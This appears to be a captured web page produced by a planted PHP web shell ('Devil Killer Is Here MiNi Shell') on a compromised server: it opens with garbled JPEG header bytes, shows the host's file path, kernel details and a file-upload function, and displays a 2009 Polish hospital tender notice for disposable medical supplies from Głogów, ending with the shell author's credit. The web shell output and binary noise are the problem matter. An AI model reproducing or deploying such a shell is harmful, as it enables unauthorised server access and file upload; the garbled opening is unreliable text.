JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090804/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090804/126677-N-2009.html

<p class="kh_header"><b>Głogów: Dostawa sprzętu jednorazowego
    użytku dla potrzeb Apteki szpitalnej. Znak sprawy: ZP/19/2009</b><br>
<b>Numer ogłoszenia: 126677 - 2009; data zamieszczenia: 04.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Opieki Zdrowotnej w Głogowie , ul. Kościuszki 15, 67-200 Głogów, woj. dolnośląskie, tel. 076 8373211, faks 076 8373377.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu jednorazowego
    użytku dla potrzeb Apteki szpitalnej. Znak sprawy: ZP/19/2009.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1)  Szczegółowy opis przedmiotu zamówienia określa Specyfikacja asortymentowo -  
   ilościowa stanowiąca załącznik nr 1 do oferty i dodatek nr 2 do siwz.
2)	Przedmiot zamówienia został podzielony na 20 pakietów. Zamawiający zezwala na składanie ofert na wybrane pakiety, przy czym w ramach pakietu wymagany jest pełny zakres asortymentu. Nie zezwala natomiast na składanie ofert na wybrane pozycje w pakietach. Zamawiający zastrzega sobie prawo zakupu mniejszej ilości artykułów medycznych:
	Pakiet nr 1    składa się z 3 pozycji i obejmuje ostrza chirurgiczne wraz z
     urządzeniem do zdejmowania ostrzy, szczotki chirurgiczne;
	Pakiet nr 2    kaniule - pakiet składa się z 2 pozycji i obejmuje neoflonki oraz
      kaniule do wlewów dożylnych;
	Pakiet nr 3    rękawice medyczne - 6 pozycji, rękawice chirurgiczne sterylne
          lateksowe i bezlateksowe, rękawice diagnostyczne leteksowe
          pudrowane, rękawice foliowe sterylne i niesterylne;
	Pakiet nr 4     igły jednorazowe  - 4 pozycje, w tym igły do iniekcji, igły typu 
		         motylek oraz igły do podawania insuliny;
	Pakiet nr 5    igły medyczne specjalistyczne - 5 pozycji w tym: igła do nakłuc
                             mostka, igła do stymulacji nerwu, igła do nakłuc talerza
                             biodrowego oraz do nakłuc lędźwiowych;
	Pakiet nr 6    sprzęt do znieczuleń przewodowych - pakiet obejmuje
     5pozycji;	
	Pakiet nr 7    zestawy i wkłucia centralne oraz wkłucia dializacyjne - 9
                             pozycji w tym: zestaw do cewnikowania żył centralnych, zestaw
                             do kaniulacji dużych naczyń, zestaw do cewnikowania tętnicy udowej;
	Pakiet nr 8 	resuscytacja, intubacja, tracheostomia  -  pakiet składa się z 9 
                               pozycji i obejmuje: zestaw do konikotomii, rurki intubacyjne o
                               różnych rozmiarach zbrojone z mankietem i bez mankietu, rurki
                               ustno-gardłowe, prowadnica intubacyjna ;
	Pakiet nr 9	cewniki, łączniki, filtry, terapia tlenowa - pakiet obejmuje 25
 pozycji, m.innymi:  filtry wirusowo-antybakteryjne, cewniki i
 maski do  podawania tlenu, worki oddechowe, cewniki do
odsysania górnych dróg oddechowych oraz inne akcesoria;
	Pakiet nr 10 	cewniki, zgłębniki, sondy, worki, dreny, drenaże - 42 pozycje
w tym: cewnik do embolectomii, zestaw do punkcji jamy
opłucnej, zestaw do drenażu opłucnej, cewnik Foley, cewnik 
 Nelaton, worek do godzinowej oraz dobowej zbiórki moczu,
 sonda żołądkowa i dwunastnicza, dren Redona, dren brzuszny,
 dren Kehra, zestaw cewników moczowodowych, zestaw do
 odsysania pola operacyjnego; 	   
	Pakiet nr 11     kraniki, rampy oraz inne akcesoria: koreczki do kaniul,
	kraniki trójdrożne, nieinwazyjny system mocowań do
                                cewników, bezigłowe porty z rozgałęzieniem i zaciskami; 
	Pakiet nr 12	 przyrządy do przetoczeń płynów infuzyjnych i krwi - 8
 pozycji:; 
	Pakiet nr 13	zestawy do żywienia - 5 pozycji:  zestawy do żywienia
 pozajelitowego i dojelitowego;
	Pakiet nr 14	czujnik do pomiaru rzutu serca  -  1 pozycja;
	Pakiet nr 15	wkłucie centralne - 1 pozycja;
	Pakiet nr 16	obłożenia operacyjne, maski, czepki, fartuchy - pakiet 
obejmuje 22  pozycje: serwety chirurgiczne i operacyjne, zestawy operacyjne, prześcieradła, pościel jednorazowa                         z fliseliny, maski i czepki chirurgiczne, pokrowce na buty, fartuchy foliowe oraz chirurgiczne sterylne, ubrania medyczne;
	Pakiet nr 17	elektrody, żele, papiery - 16 pozycji;
	Pakiet nr 18	sprzęt medyczny różny - 17 pozycji:  opaska identyfikacyjna
dla niemowląt, szpatułki laryngologiczne, zaciskacz do pępowiny, wymazów ki, pojemnik na posiew, golarki medyczne, kieliszki do leków jednorazowe, wzierniki ginekologiczne;
	Pakiet nr 19	zamknięty system do odsysania - 2 pozycje, wkłady workowe 
			jednorazowego użytku;
	Pakiet nr 20	pojemniki na zużyty sprzęt medyczny -  4 pozycje, pojemniki
o różnych pojemnościach od 0,5 l do 5 l..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 20.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> W niniejszym postępowaniu zamawiajacy nie wymaga wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.   O udzielenie niniejszego zamówienia mogą ubiegać się wykonawcy spełniający 
      warunki udziału w postępowaniu określone w art. 22 ust. 1 ustawy, tzn:
a)	posiadają uprawnienia do wykonywania określonej działalności lub czynności,
      jeżeli  ustawy nakładają obowiązek posiadania takich uprawnień;
b)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonywania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
c)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
d)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
2) Zamawiający dokona oceny spełniania przez wykonawców warunków udziału w
      postępowaniu na podstawie załączonych do oferty dokumentów i oświadczeń
     wymienionych  w rozdziale IV siwz.
     Ocena spełnienia warunków udziału w postępowaniu będzie dokonana przez
     zamawiającego zgodnie z formułą spełnia-nie spełnia. Z treści załączonych do oferty
     dokumentów musi wynikać jednoznacznie, że w/ w warunki wykonawca spełnił. 
     W przypadku niespełnienia jakiegokolwiek warunku udziału w postępowaniu
     wykonawca zostanie wykluczony  z postępowania na podstawie art. 24 ustawy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1) Oświadczenie z art. 44 Pzp. o spełnieniu warunków udziału w postępowaniu  określonych w art. 22 ust. 1 oraz, że Wykonawca nie podlega wykluczeniu z postępowania na  podstawie art. 24 ust. 1 i 2 ustawy. 2) Koncesja, zezwolenie lub licencja, jeżeli ustawy nakładają obowiązek posiadania tych  dokumentów na podjęcie działalności gospodarczej w zakresie objętym niniejszym zamówieniem.Jeśli w/ w dokument nie jest wymagany, należy dołączyć oświadczenie.3) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem   terminu składania ofert.  4) Ponadto w złożonej ofercie musza znajdować sie dokumenty: specyfikacja asortymentowo-ilościowa  (formularz cenowy); Pełnomocnictwa dla osób niewskazanych w KRS do występowania w imieniu wykonawcy, w tym do składania oświadczeń woli w imieniu wykonawcy, w toku postępowania o udzielenie niniejszego zamówienia. W przypadku oferty grupy podmiotów (np. konsorcjum) wykonawcy ustanawiają pełnomocnika do reprezentowania ich  w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia; Oświadczenie wykonawcy, że oferowane materiały medyczne posiadają aktualne dopuszczenia do obrotu zgodnie z obowiązującymi przepisami (Rozdział I pkt 3) oraz że udostępni stosowne dokumenty na wezwanie zamawiającego, w terminie przez niego wyznaczonym; Oświadczenie, że wykonawca na pisemne wezwanie zobowiązuje się  do dostarczenia w wyznaczonym przez zamawiającego terminie próbek (najmniejsze opakowanie handlowe, gotowe do użycia); Dokumenty potwierdzające, że oferowane materiały medyczne są zgodne z wymogami zamawiającego i spełniają parametry techniczne, użytkowe itd.  (katalog, folder, zdjęcia, rysunki);.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.biuletyn.sbip.pl/zoz.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ można odebrać w siedzibie zamawiającego , budynek D  -  Dział Administracyjny,  w dni  robocze w  godzinach  od 7.00 do 14.00..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.08.2009 godzina 09:00, miejsce: Zespół Opieki Zdrowotnej w Głogowie, ulica Kościuszki 15, budynek Dyrekcji  
         kancelaria..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com